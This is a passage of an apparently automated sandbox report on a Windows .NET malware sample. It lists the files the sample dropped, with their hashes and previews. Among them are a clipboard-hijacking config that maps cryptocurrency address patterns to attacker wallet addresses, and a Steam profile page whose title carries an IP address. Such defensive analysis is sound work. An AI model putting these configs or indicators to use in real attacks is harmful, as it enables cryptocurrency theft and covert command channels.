                                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                Malicious:false
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                Category:dropped
                                                                                                                Size (bytes):126976
                                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                Malicious:false
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                Category:dropped
                                                                                                                Size (bytes):5242880
                                                                                                                Entropy (8bit):0.037963276276857943
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                Malicious:false
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):32768
                                                                                                                Entropy (8bit):0.017262956703125623
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                Malicious:false
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                Category:dropped
                                                                                                                Size (bytes):40960
                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                Malicious:false
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                Category:dropped
                                                                                                                Size (bytes):114688
                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                Malicious:false
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                Category:dropped
                                                                                                                Size (bytes):98304
                                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                Malicious:false
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):32768
                                                                                                                Entropy (8bit):0.017262956703125623
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                Malicious:false
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):9571
                                                                                                                Entropy (8bit):5.536643647658967
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                                                                MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                                                                SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                                                                SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                                                                SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                                                                Malicious:false
                                                                                                                Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                Category:dropped
                                                                                                                Size (bytes):159744
                                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                Malicious:false
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                Category:dropped
                                                                                                                Size (bytes):106496
                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                Malicious:false
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):685392
                                                                                                                Entropy (8bit):6.872871740790978
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Joe Sandbox View:
                                                                                                                • Filename: VmRHSCaiyc.exe, Detection: malicious
                                                                                                                • Filename: file.exe, Detection: malicious
                                                                                                                • Filename: T2bmenoX1o.exe, Detection: malicious
                                                                                                                • Filename: XQywAEbb9e.exe, Detection: malicious
                                                                                                                • Filename: c95eb189cffef0c6b222d31de3c7ed0f9cabad48a38aa.exe, Detection: malicious
                                                                                                                • Filename: file.exe, Detection: malicious
                                                                                                                • Filename: lihZ6gUU7V.exe, Detection: malicious
                                                                                                                • Filename: Bn7LPdQA1s.exe, Detection: malicious
                                                                                                                • Filename: WiTqtf1aiE.exe, Detection: malicious
                                                                                                                • Filename: file.exe, Detection: malicious
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):608080
                                                                                                                Entropy (8bit):6.833616094889818
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Joe Sandbox View:
                                                                                                                • Filename: VmRHSCaiyc.exe, Detection: malicious
                                                                                                                • Filename: file.exe, Detection: malicious
                                                                                                                • Filename: T2bmenoX1o.exe, Detection: malicious
                                                                                                                • Filename: XQywAEbb9e.exe, Detection: malicious
                                                                                                                • Filename: c95eb189cffef0c6b222d31de3c7ed0f9cabad48a38aa.exe, Detection: malicious
                                                                                                                • Filename: file.exe, Detection: malicious
                                                                                                                • Filename: lihZ6gUU7V.exe, Detection: malicious
                                                                                                                • Filename: Bn7LPdQA1s.exe, Detection: malicious
                                                                                                                • Filename: WiTqtf1aiE.exe, Detection: malicious
                                                                                                                • Filename: file.exe, Detection: malicious
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):450024
                                                                                                                Entropy (8bit):6.673992339875127
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                Malicious:false
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2046288
                                                                                                                Entropy (8bit):6.787733948558952
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):257872
                                                                                                                Entropy (8bit):6.727482641240852
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):80880
                                                                                                                Entropy (8bit):6.920480786566406
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                Malicious:false
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\7AeSqNv1rC.exe
                                                                                                                File Type:CSV text
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1281
                                                                                                                Entropy (8bit):5.370111951859942
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                                                                                MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                                                                                SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                                                                                SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                                                                                SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                                                                                Malicious:true
                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):34889
                                                                                                                Entropy (8bit):5.399374344646687
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:6dpqme0Ih+3tAA6WG9OfcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2A:6d8me0Ih+3tAA6WG9OFhTBv++nIjBtP0
                                                                                                                MD5:FAB0C680FAA6339E9AAFF30674F712B4
                                                                                                                SHA1:6F04A1A318489654CFBB6FF9A59685E0E8FDD816
                                                                                                                SHA-256:516324F0382C81303DD4EC695A428526ECC2099A7B8705CC4B292B87E5484A47
                                                                                                                SHA-512:EADEC707A9C39B32CBB58593BC7E242447F400CECD80E458C7E5C06D2B4C78B1D079F95DC7118B209031E1499CB8966FF7C421A29F49E8286FB378CB5190583E
                                                                                                                Malicious:false
                                                                                                                Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://49.12.106.214|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link hre
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):519680
                                                                                                                Entropy (8bit):6.308273053673522
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6144:paNY2RhksAZnFcHQgu6NRvBf03SJRvX2CRXZGS9PlUlAREoghgAOAw7hB1:cN5CsIFcHQHGRvVrL99PSoghgKwl
                                                                                                                MD5:6CA0B0717CFA0684963FF129ABB8DCE9
                                                                                                                SHA1:69FB325F5FB1FE019756D68CB1555A50294DD04A
                                                                                                                SHA-256:2500AA539A7A5AE690D830FAE6A2B89E26BA536F8751BA554E9F4967D48E6CFA
                                                                                                                SHA-512:48F9435CF0A17AED8FF4103FA4D52E9C56F6625331A8B9627B891A5CCADA14F14C2641AAC6A5C09570F26452E5416AC28B31FE760A3F8BA2F5FE9222D3C336EE
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........y...y...y..?.s..y..?.q..y..?.p..y..&'...y..&'...y..&'...y.......y...y...y..<'...y..<'...y..Rich.y..........PE..L...(..f.....................X.......H............@..........................@............@.....................................P................................B...{.............................. {..@...............x............................text............................... ..`.rdata..x...........................@..@.data....!..........................@....gfids..............................@..@.reloc...B.......D..................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                File Type:JSON data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):280
                                                                                                                Entropy (8bit):5.680675858629041
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:3HuRgkfFeodNXJHvQ0VOFNhiXBrMFQk2hoqlb1Rmc7v:OkQJF0xUBYJuVF1wcD
                                                                                                                MD5:D3A095E8C8114A3FBD4E277976EFE21C
                                                                                                                SHA1:88C6D267492C69CDDF1FD7F70E782F05A0BBEB20
                                                                                                                SHA-256:F34C4133A70ADFAC9F94F5F33790806A3E3B5B26C0D658C9A80BCE2EC9DA6AA1
                                                                                                                SHA-512:D3DEAEE573A63AD19E5C1200B4D51BF58388CCC669105A272197470BA74F93FB264927956B61C52475A2048610C007E553786F7581FB20DBBECD59343214F918
                                                                                                                Malicious:false
                                                                                                                Preview:{.. "patterns": {.. "^((bc1[0-9A-Za-z]{32,64})|([13][a-km-zA-HJ-NP-Z1-9]{25,34}))$": "bc1qajmcwhljrvvhzh7gvj9llvjqu0muv08nzr2pdd",.. "^0x[a-fA-F0-9]{40}$": "0xE10E0C9cbD9415B587c294ACa2082c562DC649ed",.. "T[A-Za-z1-9]{33}": "TUT6xRHgJVLan3FWEeavPjvPGnVsm9GG67".. }..}..
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1048575
                                                                                                                Entropy (8bit):0.0
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:7:7
                                                                                                                MD5:43A1B333A5D6F6C84E6F6A4F28B5C2C5
                                                                                                                SHA1:02C7CDB94BE185EFC03954C2E24738CFAA691C2D
                                                                                                                SHA-256:9C3F7AD82D80541327FB6987168F02D9160A4A737F67101DA2123E9A4EBEB4AA
                                                                                                                SHA-512:049BE239A5C3DE5DF953A8F6A42A2C9DD8D388A7D9BA0277CB0F46F7E23DC8D8B88D2A337F00091BCC0D10AB0ED0C1DA8F73B7D40B99D319E9A4D17B72652BBE
                                                                                                                Malicious:false
                                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Entropy (8bit):7.628032874941183
                                                                                                                TrID:
                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                File name:7AeSqNv1rC.exe
                                                                                                                File size:608'256 bytes
                                                                                                                MD5:f275736a38a6b90825076e8d786ad5c5
                                                                                                                SHA1:c0d862ceab728736580f043316cdc099b2ab8924
                                                                                                                SHA256:b48eeab60494eb44d8d5ef10a87fd46ad1aa33fdcf7245efb636f69f2fd55f42
                                                                                                                SHA512:b6662ee0426b45c5629808718613a687808deeaca692bb00d26ac5c9098b8a36a126ef80eca470db085aa5a84e38a9ee088a165cea821bf1226055a4fd842711
                                                                                                                SSDEEP:12288:Z23Df42FsPVesttHjpBKBmtvoYTjapYQIhtud8FpowFgXRo:Sz4xDTHt/tgYTjJQ0pXowWXR
                                                                                                                TLSH:8BD438E7B2C1DA9AC8D1CA74F49302F9036D9F87CD54925BD60CFE8E39B81866A47311
                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....W-..........."...0......R........... ... ....@.. ....................................@................................
                                                                                                                Icon Hash:45a18c9696969c63
                                                                                                                Entrypoint:0x491396
                                                                                                                Entrypoint Section:.text
                                                                                                                Digitally signed:false
                                                                                                                Imagebase:0x400000
                                                                                                                Subsystem:windows gui
                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                Time Stamp:0xB52D572E [Wed Apr 28 02:32:14 2066 UTC]
                                                                                                                TLS Callbacks:
                                                                                                                CLR (.Net) Version:
